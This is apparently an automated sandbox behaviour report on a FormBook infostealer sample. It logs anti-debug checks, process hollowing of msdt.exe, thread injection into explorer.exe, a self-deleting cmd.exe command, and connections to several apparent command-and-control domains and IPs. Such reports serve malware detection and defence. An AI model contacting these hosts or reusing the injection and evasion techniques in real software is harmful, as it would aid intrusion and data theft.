          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04758E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04768EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04724F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04724F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04738794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04740050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04740050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04764A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04764A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04743A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04738A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.platinumcredit.net
          Source: C:\Windows\explorer.exeDomain query: www.thefullfledged.com
          Source: C:\Windows\explorer.exeDomain query: www.jakital.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80
          Source: C:\Windows\explorer.exeDomain query: www.xcgtsret.com
          Source: C:\Windows\explorer.exeDomain query: www.suepersoldiers.com
          Source: C:\Windows\explorer.exeDomain query: www.arsels.info
          Source: C:\Windows\explorer.exeDomain query: www.electricatrick.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.219 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.204.216.132 80
          Source: C:\Windows\explorer.exeDomain query: www.151motors.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1B0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeProcess created: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000A.00000000.327891256.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.293464513.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.310106636.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.331243108.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.328441000.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.294438190.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.310465456.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.335912866.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.300895373.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.320269745.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
